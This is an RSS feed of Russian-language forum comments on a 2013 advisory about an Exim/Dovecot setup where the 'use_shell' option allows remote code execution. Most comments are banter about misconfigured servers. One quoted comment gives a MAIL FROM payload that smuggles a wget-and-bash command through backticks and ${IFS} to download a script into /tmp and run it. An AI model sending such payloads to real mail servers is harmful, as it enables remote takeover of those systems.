<?xml version="1.0" encoding="koi8-r"?>
<rss version="0.91">
<channel>
    <title>OpenForum RSS: Опасная уязвимость при необдуманном использовании связки Exi...</title>
    <link>https://m.opennet.dev/openforum/vsluhforumID3/89882.html</link>
    <description>В рекомендованном (http://wiki.dovecot.org/LDA/Exim?action=recall&amp;rev=16) на wiki-сайте проекта и в некоторых других руководствах примере настройки связки почтового сервера Exim с IMAP/POP3-сервером Dovecot выявлена критическая уязвимость (https://www.redteam-pentesting.de/de/advisories/rt-sa-2013-001/-exim-with-dovecot-typical-misconfiguration-leads-to-remote-command-execution), позволяющая выполнить произвольный код на сервере. Уязвимость может быть эксплуатирована через отправку письма со специальным образом оформленным адресом отправителя. Проблема проявляется только в системах, в которых в конфигурации Exim указана опция &quot;use_shell&quot; в блоке подключения Dovecot. &lt;br&gt;&lt;br&gt;&lt;br&gt;Изначально статья с ошибочной опцией была опубликована в 2009 году на официальном сайте проекта Dovecot и ошибка успела перекочевать во многие другие руководства. Всем пользователям связки Exim и Dovecot рекомендуется проверить настройки на предмет отсутствия опции &quot;use_shell&quot;, при включении которой агент доставки запускается с использованием</description>

<item>
    <title>Опасная уязвимость при использовании рекомендуемых в докумен... (Аноним)</title>
    <link>https://m.opennet.dev/openforum/vsluhforumID3/89882.html#67</link>
    <pubDate>Wed, 08 May 2013 08:45:28 GMT</pubDate>
    <description>Редко применяется, так как во многихдистрибутивах во время апгрейда пакетов запускаются постинстал скрипты из /tmp&lt;br&gt;</description>
</item>

<item>
    <title>Опасная уязвимость при необдуманном использовании связки Exi... (AnonuS)</title>
    <link>https://m.opennet.dev/openforum/vsluhforumID3/89882.html#66</link>
    <pubDate>Tue, 07 May 2013 20:28:27 GMT</pubDate>
    <description>&amp;gt; Ну дык: &lt;br&gt;&amp;gt;&amp;gt; MAIL FROM: red&#096;wget$&#123;IFS&#125;-O$&#123;IFS&#125;/tmp/p$&#123;IFS&#125;example.com/test.sh&#096;&#096;bash$&#123;IFS&#125;/tmp/p&#096;team&#064;example.com &lt;br&gt;&amp;gt; А то всё, NULL-pointers, SQL-inject, array-bounds, race-conditions, double-free, скукотища... &lt;br&gt;&amp;gt;  :D &lt;br&gt;&lt;br&gt;Да, ты прав, это действительно новое слово в науке и технике, свежая струя так сказать...&lt;br&gt;&lt;br&gt;:-)))&lt;br&gt;</description>
</item>

<item>
    <title>Опасная уязвимость при необдуманном использовании связки Exi... (Andrey Mitrofanov)</title>
    <link>https://m.opennet.dev/openforum/vsluhforumID3/89882.html#65</link>
    <pubDate>Mon, 06 May 2013 19:20:11 GMT</pubDate>
    <description>&amp;gt; как дети чесслово. шеллы какие-то, эскейпирование.&lt;br&gt;&amp;gt; учитесь, как настоящие энтерпрайзные дырки в почте делать-то надо &lt;br&gt;&lt;br&gt;Нет, Только bash! Ленин завещал учиться, но до до джаввы же.&lt;br&gt;&lt;br&gt;&amp;gt; &quot;The IBM Notes mail client accepts Java applet tags and JavaScript tags </description>
</item>

<item>
    <title>Опасная уязвимость при необдуманном использовании связки Exi... (Аноним)</title>
    <link>https://m.opennet.dev/openforum/vsluhforumID3/89882.html#64</link>
    <pubDate>Mon, 06 May 2013 16:31:56 GMT</pubDate>
    <description>а вот спорим, что вы сами никогда реальный почтовый сервер не поднимали...&lt;br&gt;</description>
</item>

<item>
    <title>Опасная уязвимость при необдуманном использовании связки Exi... (DeadLoco)</title>
    <link>https://m.opennet.dev/openforum/vsluhforumID3/89882.html#63</link>
    <pubDate>Mon, 06 May 2013 15:13:43 GMT</pubDate>
    <description>&amp;gt; ПИН-код на кредитке фломастером не пишешь? :) &lt;br&gt;&lt;br&gt;Неа :)&lt;br&gt;&lt;br&gt;Я всего лишь пытаюсь донести до общественности простую мысль, что на большинстве хостов, настроенных конфиг-киддизами по популярным гогно-руководствам, можно обнаружить массу презабавнейшего - от тупо дефолтного до адвансед-кривого бай дезигн &quot;по рекомендациям от лучших собаководов&quot;.&lt;br&gt;</description>
</item>

<item>
    <title>Опасная уязвимость при необдуманном использовании связки Exi... (DeadLoco)</title>
    <link>https://m.opennet.dev/openforum/vsluhforumID3/89882.html#62</link>
    <pubDate>Mon, 06 May 2013 14:57:53 GMT</pubDate>
    <description>&amp;gt; BMW Z4 - машина.&lt;br&gt;&amp;gt; BMW Z4 в пос. Кукуево - понты граничащие с маразмом.&lt;br&gt;&lt;br&gt;BMW Z4 в придорожном столбе (вследствие неумения обращаться с) - источник лулзов :) &lt;br&gt;Впрочем, как и экзим с довекотом, да и почти любой другой софт.&lt;br&gt;</description>
</item>

<item>
    <title>Опасная уязвимость при необдуманном использовании связки Exi... (pavlinux)</title>
    <link>https://m.opennet.dev/openforum/vsluhforumID3/89882.html#61</link>
    <pubDate>Mon, 06 May 2013 12:29:57 GMT</pubDate>
    <description>&amp;gt;&amp;gt; Да нет там рута! Там есть привилегии и контекст.&lt;br&gt;&amp;gt; При установке мускля автоматом создается юзер БД root с пустым паролем и &lt;br&gt;&amp;gt; полными привилегиями, включая грант, на таблицу mysql. Так что, я б &lt;br&gt;&amp;gt; поостерегся делать скоропалительные заявления.&lt;br&gt;&lt;br&gt;ПИН-код на кредитке фломастером не пишешь? :)&lt;br&gt;&lt;br&gt;</description>
</item>

<item>
    <title>Опасная уязвимость при необдуманном использовании связки Exi... (pavlinux)</title>
    <link>https://m.opennet.dev/openforum/vsluhforumID3/89882.html#60</link>
    <pubDate>Mon, 06 May 2013 12:27:35 GMT</pubDate>
    <description>BMW Z4 - машина.&lt;br&gt;BMW Z4 в пос. Кукуево - понты граничащие с маразмом.&lt;br&gt;&lt;br&gt;</description>
</item>

<item>
    <title>Опасная уязвимость при использовании рекомендуемых в докумен... (Аноним)</title>
    <link>https://m.opennet.dev/openforum/vsluhforumID3/89882.html#59</link>
    <pubDate>Mon, 06 May 2013 09:13:33 GMT</pubDate>
    <description>а как же noexec в /tmp ?&lt;br&gt;</description>
</item>

</channel>
</rss>
